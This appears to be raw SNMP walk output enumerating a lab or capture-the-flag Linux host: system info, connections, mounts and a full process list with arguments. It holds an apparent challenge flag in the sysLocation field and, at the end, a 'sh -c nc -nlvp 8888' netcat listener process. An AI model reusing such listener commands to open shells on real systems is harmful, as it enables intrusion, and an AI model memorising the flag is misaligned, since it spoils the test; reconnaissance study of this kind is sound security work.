iso.3.6.1.2.1.1.3.0 = Timeticks: (11722) 0:01:57.22
iso.3.6.1.2.1.1.4.0 = STRING: "nobody@example.org"
iso.3.6.1.2.1.1.5.0 = STRING: "basic"
iso.3.6.1.2.1.1.6.0 = STRING: "blizzard{p@5$w0rd.txt}"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."

iso.3.6.1.2.1.6.13.1.4.10.0.2.33.22.10.0.4.81.36638 = IpAddress: 10.0.4.81
iso.3.6.1.2.1.6.13.1.4.10.0.2.33.22.10.0.4.233.47448 = IpAddress: 10.0.4.233

iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-4.4.0-97-generic root=/dev/mapper/basic--vg-root ro
"

iso.3.6.1.2.1.25.2.3.1.2.62 = OID: iso.3.6.1.2.1.25.2.1.4
iso.3.6.1.2.1.25.2.3.1.3.1 = STRING: "Physical memory"
iso.3.6.1.2.1.25.2.3.1.3.3 = STRING: "Virtual memory"
iso.3.6.1.2.1.25.2.3.1.3.6 = STRING: "Memory buffers"
iso.3.6.1.2.1.25.2.3.1.3.7 = STRING: "Cached memory"
iso.3.6.1.2.1.25.2.3.1.3.8 = STRING: "Shared memory"
iso.3.6.1.2.1.25.2.3.1.3.10 = STRING: "Swap space"
iso.3.6.1.2.1.25.2.3.1.3.31 = STRING: "/"
iso.3.6.1.2.1.25.2.3.1.3.37 = STRING: "/run"
iso.3.6.1.2.1.25.2.3.1.3.39 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.2.3.1.3.40 = STRING: "/run/lock"
iso.3.6.1.2.1.25.2.3.1.3.41 = STRING: "/sys/fs/cgroup"
iso.3.6.1.2.1.25.2.3.1.3.59 = STRING: "/boot"
iso.3.6.1.2.1.25.2.3.1.3.61 = STRING: "/run/user/1003"
iso.3.6.1.2.1.25.2.3.1.3.62 = STRING: "/run/user/1001"
iso.3.6.1.2.1.25.2.3.1.4.1 = INTEGER: 1024

iso.3.6.1.2.1.25.3.2.1.1.196608 = INTEGER: 196608
iso.3.6.1.2.1.25.3.2.1.1.196609 = INTEGER: 196609
iso.3.6.1.2.1.25.3.2.1.1.262145 = INTEGER: 262145
iso.3.6.1.2.1.25.3.2.1.1.262146 = INTEGER: 262146
iso.3.6.1.2.1.25.3.2.1.1.786432 = INTEGER: 786432
iso.3.6.1.2.1.25.3.2.1.2.196608 = OID: iso.3.6.1.2.1.25.3.1.3
iso.3.6.1.2.1.25.3.2.1.2.196609 = OID: iso.3.6.1.2.1.25.3.1.3
iso.3.6.1.2.1.25.3.2.1.2.262145 = OID: iso.3.6.1.2.1.25.3.1.4
iso.3.6.1.2.1.25.3.2.1.2.262146 = OID: iso.3.6.1.2.1.25.3.1.4
iso.3.6.1.2.1.25.3.2.1.2.786432 = OID: iso.3.6.1.2.1.25.3.1.12
iso.3.6.1.2.1.25.3.2.1.3.196608 = STRING: "GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz"
iso.3.6.1.2.1.25.3.2.1.3.196609 = STRING: "GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz"
iso.3.6.1.2.1.25.3.2.1.3.262145 = STRING: "network interface lo"
iso.3.6.1.2.1.25.3.2.1.3.262146 = STRING: "network interface ens160"
iso.3.6.1.2.1.25.3.2.1.3.786432 = STRING: "Guessing that there's a floating point co-processor"

iso.3.6.1.2.1.25.3.8.1.1.10 = INTEGER: 10
iso.3.6.1.2.1.25.3.8.1.1.11 = INTEGER: 11
iso.3.6.1.2.1.25.3.8.1.1.29 = INTEGER: 29
iso.3.6.1.2.1.25.3.8.1.1.31 = INTEGER: 31
iso.3.6.1.2.1.25.3.8.1.1.32 = INTEGER: 32
iso.3.6.1.2.1.25.3.8.1.2.1 = STRING: "/"
iso.3.6.1.2.1.25.3.8.1.2.7 = STRING: "/run"
iso.3.6.1.2.1.25.3.8.1.2.9 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.3.8.1.2.10 = STRING: "/run/lock"
iso.3.6.1.2.1.25.3.8.1.2.11 = STRING: "/sys/fs/cgroup"
iso.3.6.1.2.1.25.3.8.1.2.29 = STRING: "/boot"
iso.3.6.1.2.1.25.3.8.1.2.31 = STRING: "/run/user/1003"
iso.3.6.1.2.1.25.3.8.1.2.32 = STRING: "/run/user/1001"
iso.3.6.1.2.1.25.3.8.1.3.1 = ""

iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.2 = STRING: "kthreadd"
iso.3.6.1.2.1.25.4.2.1.2.3 = STRING: "ksoftirqd/0"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "kworker/0:0"
iso.3.6.1.2.1.25.4.2.1.2.5 = STRING: "kworker/0:0H"
iso.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/u4:0"
iso.3.6.1.2.1.25.4.2.1.2.7 = STRING: "rcu_sched"
iso.3.6.1.2.1.25.4.2.1.2.8 = STRING: "rcu_bh"
iso.3.6.1.2.1.25.4.2.1.2.9 = STRING: "migration/0"
iso.3.6.1.2.1.25.4.2.1.2.10 = STRING: "watchdog/0"
iso.3.6.1.2.1.25.4.2.1.2.11 = STRING: "watchdog/1"
iso.3.6.1.2.1.25.4.2.1.2.12 = STRING: "migration/1"
iso.3.6.1.2.1.25.4.2.1.2.13 = STRING: "ksoftirqd/1"
iso.3.6.1.2.1.25.4.2.1.2.14 = STRING: "kworker/1:0"
iso.3.6.1.2.1.25.4.2.1.2.15 = STRING: "kworker/1:0H"
iso.3.6.1.2.1.25.4.2.1.2.16 = STRING: "kdevtmpfs"
iso.3.6.1.2.1.25.4.2.1.2.17 = STRING: "netns"
iso.3.6.1.2.1.25.4.2.1.2.18 = STRING: "perf"
iso.3.6.1.2.1.25.4.2.1.2.19 = STRING: "khungtaskd"
iso.3.6.1.2.1.25.4.2.1.2.20 = STRING: "writeback"
iso.3.6.1.2.1.25.4.2.1.2.21 = STRING: "ksmd"
iso.3.6.1.2.1.25.4.2.1.2.22 = STRING: "khugepaged"
iso.3.6.1.2.1.25.4.2.1.2.23 = STRING: "crypto"
iso.3.6.1.2.1.25.4.2.1.2.24 = STRING: "kintegrityd"
iso.3.6.1.2.1.25.4.2.1.2.25 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.26 = STRING: "kblockd"
iso.3.6.1.2.1.25.4.2.1.2.27 = STRING: "ata_sff"
iso.3.6.1.2.1.25.4.2.1.2.28 = STRING: "md"
iso.3.6.1.2.1.25.4.2.1.2.29 = STRING: "devfreq_wq"
iso.3.6.1.2.1.25.4.2.1.2.30 = STRING: "kworker/u4:1"
iso.3.6.1.2.1.25.4.2.1.2.31 = STRING: "kworker/1:1"
iso.3.6.1.2.1.25.4.2.1.2.32 = STRING: "kworker/0:1"
iso.3.6.1.2.1.25.4.2.1.2.34 = STRING: "kswapd0"
iso.3.6.1.2.1.25.4.2.1.2.35 = STRING: "vmstat"
iso.3.6.1.2.1.25.4.2.1.2.36 = STRING: "fsnotify_mark"
iso.3.6.1.2.1.25.4.2.1.2.37 = STRING: "ecryptfs-kthrea"
iso.3.6.1.2.1.25.4.2.1.2.53 = STRING: "kthrotld"
iso.3.6.1.2.1.25.4.2.1.2.54 = STRING: "acpi_thermal_pm"
iso.3.6.1.2.1.25.4.2.1.2.55 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.56 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.57 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.58 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.59 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.60 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.61 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.62 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.63 = STRING: "scsi_eh_0"
iso.3.6.1.2.1.25.4.2.1.2.64 = STRING: "scsi_tmf_0"
iso.3.6.1.2.1.25.4.2.1.2.65 = STRING: "scsi_eh_1"
iso.3.6.1.2.1.25.4.2.1.2.66 = STRING: "scsi_tmf_1"
iso.3.6.1.2.1.25.4.2.1.2.67 = STRING: "kworker/u4:2"
iso.3.6.1.2.1.25.4.2.1.2.68 = STRING: "kworker/u4:3"
iso.3.6.1.2.1.25.4.2.1.2.72 = STRING: "ipv6_addrconf"
iso.3.6.1.2.1.25.4.2.1.2.73 = STRING: "kworker/0:2"
iso.3.6.1.2.1.25.4.2.1.2.75 = STRING: "kworker/u4:4"
iso.3.6.1.2.1.25.4.2.1.2.87 = STRING: "deferwq"
iso.3.6.1.2.1.25.4.2.1.2.88 = STRING: "charger_manager"
iso.3.6.1.2.1.25.4.2.1.2.89 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.148 = STRING: "mpt_poll_0"
iso.3.6.1.2.1.25.4.2.1.2.149 = STRING: "mpt/0"
iso.3.6.1.2.1.25.4.2.1.2.150 = STRING: "kpsmoused"
iso.3.6.1.2.1.25.4.2.1.2.180 = STRING: "scsi_eh_2"
iso.3.6.1.2.1.25.4.2.1.2.181 = STRING: "scsi_tmf_2"
iso.3.6.1.2.1.25.4.2.1.2.182 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.183 = STRING: "ttm_swap"
iso.3.6.1.2.1.25.4.2.1.2.268 = STRING: "raid5wq"
iso.3.6.1.2.1.25.4.2.1.2.292 = STRING: "kdmflush"
iso.3.6.1.2.1.25.4.2.1.2.293 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.302 = STRING: "kdmflush"
iso.3.6.1.2.1.25.4.2.1.2.303 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.321 = STRING: "bioset"
iso.3.6.1.2.1.25.4.2.1.2.345 = STRING: "jbd2/dm-0-8"
iso.3.6.1.2.1.25.4.2.1.2.346 = STRING: "ext4-rsv-conver"
iso.3.6.1.2.1.25.4.2.1.2.395 = STRING: "kworker/0:1H"
iso.3.6.1.2.1.25.4.2.1.2.399 = STRING: "iscsi_eh"
iso.3.6.1.2.1.25.4.2.1.2.407 = STRING: "kworker/0:3"
iso.3.6.1.2.1.25.4.2.1.2.408 = STRING: "systemd-journal"
iso.3.6.1.2.1.25.4.2.1.2.412 = STRING: "kworker/1:2"
iso.3.6.1.2.1.25.4.2.1.2.424 = STRING: "kauditd"
iso.3.6.1.2.1.25.4.2.1.2.438 = STRING: "ib_addr"
iso.3.6.1.2.1.25.4.2.1.2.440 = STRING: "ib_mcast"
iso.3.6.1.2.1.25.4.2.1.2.441 = STRING: "ib_nl_sa_wq"
iso.3.6.1.2.1.25.4.2.1.2.442 = STRING: "lvmetad"
iso.3.6.1.2.1.25.4.2.1.2.443 = STRING: "ib_cm"
iso.3.6.1.2.1.25.4.2.1.2.449 = STRING: "iw_cm_wq"
iso.3.6.1.2.1.25.4.2.1.2.451 = STRING: "rdma_cm"
iso.3.6.1.2.1.25.4.2.1.2.468 = STRING: "systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.2.629 = STRING: "kworker/1:3"
iso.3.6.1.2.1.25.4.2.1.2.843 = STRING: "ext4-rsv-conver"
iso.3.6.1.2.1.25.4.2.1.2.867 = STRING: "systemd-timesyn"
iso.3.6.1.2.1.25.4.2.1.2.1003 = STRING: "atd"
iso.3.6.1.2.1.25.4.2.1.2.1006 = STRING: "vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.2.1008 = STRING: "rsyslogd"
iso.3.6.1.2.1.25.4.2.1.2.1009 = STRING: "cron"
iso.3.6.1.2.1.25.4.2.1.2.1014 = STRING: "accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.2.1015 = STRING: "systemd-logind"
iso.3.6.1.2.1.25.4.2.1.2.1017 = STRING: "lxcfs"
iso.3.6.1.2.1.25.4.2.1.2.1022 = STRING: "kworker/1:4"
iso.3.6.1.2.1.25.4.2.1.2.1026 = STRING: "dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.2.1074 = STRING: "acpid"
iso.3.6.1.2.1.25.4.2.1.2.1079 = STRING: "snapd"
iso.3.6.1.2.1.25.4.2.1.2.1090 = STRING: "mdadm"
iso.3.6.1.2.1.25.4.2.1.2.1094 = STRING: "polkitd"
iso.3.6.1.2.1.25.4.2.1.2.1121 = STRING: "kworker/1:1H"
iso.3.6.1.2.1.25.4.2.1.2.1189 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1191 = STRING: "named"
iso.3.6.1.2.1.25.4.2.1.2.1193 = STRING: "php"
iso.3.6.1.2.1.25.4.2.1.2.1195 = STRING: "php"
iso.3.6.1.2.1.25.4.2.1.2.1198 = STRING: "python"
iso.3.6.1.2.1.25.4.2.1.2.1217 = STRING: "iscsid"
iso.3.6.1.2.1.25.4.2.1.2.1218 = STRING: "iscsid"
iso.3.6.1.2.1.25.4.2.1.2.1235 = STRING: "kworker/0:4"
iso.3.6.1.2.1.25.4.2.1.2.1278 = STRING: "atftpd"
iso.3.6.1.2.1.25.4.2.1.2.1284 = STRING: "inetutils-inetd"
iso.3.6.1.2.1.25.4.2.1.2.1287 = STRING: "irqbalance"
iso.3.6.1.2.1.25.4.2.1.2.1299 = STRING: "agetty"
iso.3.6.1.2.1.25.4.2.1.2.1315 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.1374 = STRING: "systemd-network"
iso.3.6.1.2.1.25.4.2.1.2.1472 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1615 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.1626 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.2.1704 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1705 = STRING: "bash"
iso.3.6.1.2.1.25.4.2.1.2.1888 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1907 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.1908 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.2.1941 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1942 = STRING: "lshell"
iso.3.6.1.2.1.25.4.2.1.2.2033 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.2.2034 = STRING: "nc"
iso.3.6.1.2.1.25.4.2.1.3.1 = OID: ccitt.0

iso.3.6.1.2.1.25.4.2.1.4.408 = STRING: "/lib/systemd/systemd-journald"
iso.3.6.1.2.1.25.4.2.1.4.412 = ""
iso.3.6.1.2.1.25.4.2.1.4.424 = ""
iso.3.6.1.2.1.25.4.2.1.4.438 = ""
iso.3.6.1.2.1.25.4.2.1.4.440 = ""
iso.3.6.1.2.1.25.4.2.1.4.441 = ""
iso.3.6.1.2.1.25.4.2.1.4.442 = STRING: "/sbin/lvmetad"
iso.3.6.1.2.1.25.4.2.1.4.443 = ""
iso.3.6.1.2.1.25.4.2.1.4.449 = ""
iso.3.6.1.2.1.25.4.2.1.4.451 = ""
iso.3.6.1.2.1.25.4.2.1.4.468 = STRING: "/lib/systemd/systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.4.629 = ""
iso.3.6.1.2.1.25.4.2.1.4.843 = ""
iso.3.6.1.2.1.25.4.2.1.4.867 = STRING: "/lib/systemd/systemd-timesyncd"
iso.3.6.1.2.1.25.4.2.1.4.1003 = STRING: "/usr/sbin/atd"
iso.3.6.1.2.1.25.4.2.1.4.1006 = STRING: "/usr/bin/vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.4.1008 = STRING: "/usr/sbin/rsyslogd"
iso.3.6.1.2.1.25.4.2.1.4.1009 = STRING: "/usr/sbin/cron"
iso.3.6.1.2.1.25.4.2.1.4.1014 = STRING: "/usr/lib/accountsservice/accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.4.1015 = STRING: "/lib/systemd/systemd-logind"
iso.3.6.1.2.1.25.4.2.1.4.1017 = STRING: "/usr/bin/lxcfs"
iso.3.6.1.2.1.25.4.2.1.4.1022 = ""
iso.3.6.1.2.1.25.4.2.1.4.1026 = STRING: "/usr/bin/dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.4.1074 = STRING: "/usr/sbin/acpid"
iso.3.6.1.2.1.25.4.2.1.4.1079 = STRING: "/usr/lib/snapd/snapd"
iso.3.6.1.2.1.25.4.2.1.4.1090 = STRING: "/sbin/mdadm"
iso.3.6.1.2.1.25.4.2.1.4.1094 = STRING: "/usr/lib/policykit-1/polkitd"
iso.3.6.1.2.1.25.4.2.1.4.1121 = ""
iso.3.6.1.2.1.25.4.2.1.4.1189 = STRING: "/usr/sbin/sshd"
iso.3.6.1.2.1.25.4.2.1.4.1191 = STRING: "/usr/sbin/named"
iso.3.6.1.2.1.25.4.2.1.4.1193 = STRING: "/usr/bin/php"
iso.3.6.1.2.1.25.4.2.1.4.1195 = STRING: "/usr/bin/php"
iso.3.6.1.2.1.25.4.2.1.4.1198 = STRING: "/usr/bin/python"
iso.3.6.1.2.1.25.4.2.1.4.1217 = STRING: "/sbin/iscsid"
iso.3.6.1.2.1.25.4.2.1.4.1218 = STRING: "/sbin/iscsid"
iso.3.6.1.2.1.25.4.2.1.4.1235 = ""
iso.3.6.1.2.1.25.4.2.1.4.1278 = STRING: "/usr/sbin/atftpd"
iso.3.6.1.2.1.25.4.2.1.4.1284 = STRING: "/usr/sbin/inetutils-inetd"
iso.3.6.1.2.1.25.4.2.1.4.1287 = STRING: "/usr/sbin/irqbalance"
iso.3.6.1.2.1.25.4.2.1.4.1299 = STRING: "/sbin/agetty"
iso.3.6.1.2.1.25.4.2.1.4.1315 = STRING: "/usr/sbin/snmpd"
iso.3.6.1.2.1.25.4.2.1.4.1374 = STRING: "/lib/systemd/systemd-networkd"
iso.3.6.1.2.1.25.4.2.1.4.1472 = STRING: "sshd: sombra [priv]"
iso.3.6.1.2.1.25.4.2.1.4.1615 = STRING: "/lib/systemd/systemd"
iso.3.6.1.2.1.25.4.2.1.4.1626 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.4.1704 = STRING: "sshd: sombra@pts/0"
iso.3.6.1.2.1.25.4.2.1.4.1705 = STRING: "-bash"
iso.3.6.1.2.1.25.4.2.1.4.1888 = STRING: "sshd: tracer [priv]"
iso.3.6.1.2.1.25.4.2.1.4.1907 = STRING: "/lib/systemd/systemd"
iso.3.6.1.2.1.25.4.2.1.4.1908 = STRING: "(sd-pam)"
iso.3.6.1.2.1.25.4.2.1.4.1941 = STRING: "sshd: tracer@pts/1"
iso.3.6.1.2.1.25.4.2.1.4.1942 = STRING: "/usr/bin/python"
iso.3.6.1.2.1.25.4.2.1.4.2033 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.2034 = STRING: "nc"

iso.3.6.1.2.1.25.4.2.1.5.407 = ""
iso.3.6.1.2.1.25.4.2.1.5.408 = ""
iso.3.6.1.2.1.25.4.2.1.5.412 = ""
iso.3.6.1.2.1.25.4.2.1.5.424 = ""
iso.3.6.1.2.1.25.4.2.1.5.438 = ""
iso.3.6.1.2.1.25.4.2.1.5.440 = ""
iso.3.6.1.2.1.25.4.2.1.5.441 = ""
iso.3.6.1.2.1.25.4.2.1.5.442 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.443 = ""
iso.3.6.1.2.1.25.4.2.1.5.449 = ""
iso.3.6.1.2.1.25.4.2.1.5.451 = ""
iso.3.6.1.2.1.25.4.2.1.5.468 = ""
iso.3.6.1.2.1.25.4.2.1.5.629 = ""
iso.3.6.1.2.1.25.4.2.1.5.843 = ""
iso.3.6.1.2.1.25.4.2.1.5.867 = ""
iso.3.6.1.2.1.25.4.2.1.5.1003 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.1006 = ""
iso.3.6.1.2.1.25.4.2.1.5.1008 = STRING: "-n"
iso.3.6.1.2.1.25.4.2.1.5.1009 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.1014 = ""
iso.3.6.1.2.1.25.4.2.1.5.1015 = ""
iso.3.6.1.2.1.25.4.2.1.5.1017 = STRING: "/var/lib/lxcfs/"
iso.3.6.1.2.1.25.4.2.1.5.1022 = ""
iso.3.6.1.2.1.25.4.2.1.5.1026 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation"
iso.3.6.1.2.1.25.4.2.1.5.1074 = ""
iso.3.6.1.2.1.25.4.2.1.5.1079 = ""
iso.3.6.1.2.1.25.4.2.1.5.1090 = STRING: "--monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog"
iso.3.6.1.2.1.25.4.2.1.5.1094 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1121 = ""
iso.3.6.1.2.1.25.4.2.1.5.1189 = STRING: "-D"
iso.3.6.1.2.1.25.4.2.1.5.1191 = STRING: "-f -u bind"
iso.3.6.1.2.1.25.4.2.1.5.1193 = STRING: "-S 0.0.0.0:4848 -t /home/pingpwn/www"
iso.3.6.1.2.1.25.4.2.1.5.1195 = STRING: "-S 0.0.0.0:12345 -t /home/agentdb/www"
iso.3.6.1.2.1.25.4.2.1.5.1198 = STRING: "/root/listen.py"
iso.3.6.1.2.1.25.4.2.1.5.1217 = ""
iso.3.6.1.2.1.25.4.2.1.5.1218 = ""
iso.3.6.1.2.1.25.4.2.1.5.1235 = ""
iso.3.6.1.2.1.25.4.2.1.5.1278 = STRING: "--daemon --tftpd-timeout 60 --retry-timeout 5 --maxthread 200 --verbose=5 --port=52793 /srv/tftp"
iso.3.6.1.2.1.25.4.2.1.5.1284 = ""
iso.3.6.1.2.1.25.4.2.1.5.1287 = STRING: "--pid=/var/run/irqbalance.pid"
iso.3.6.1.2.1.25.4.2.1.5.1299 = STRING: "--noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1315 = STRING: "-Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.1374 = ""
iso.3.6.1.2.1.25.4.2.1.5.1472 = ""
iso.3.6.1.2.1.25.4.2.1.5.1615 = STRING: "--user"
iso.3.6.1.2.1.25.4.2.1.5.1626 = ""
iso.3.6.1.2.1.25.4.2.1.5.1704 = ""
iso.3.6.1.2.1.25.4.2.1.5.1705 = ""
iso.3.6.1.2.1.25.4.2.1.5.1888 = ""
iso.3.6.1.2.1.25.4.2.1.5.1907 = STRING: "--user"
iso.3.6.1.2.1.25.4.2.1.5.1908 = ""
iso.3.6.1.2.1.25.4.2.1.5.1941 = ""
iso.3.6.1.2.1.25.4.2.1.5.1942 = STRING: "/usr/bin/lshell"
iso.3.6.1.2.1.25.4.2.1.5.2033 = STRING: "-c nc -nlvp 8888"
iso.3.6.1.2.1.25.4.2.1.5.2034 = STRING: "-nlvp 8888"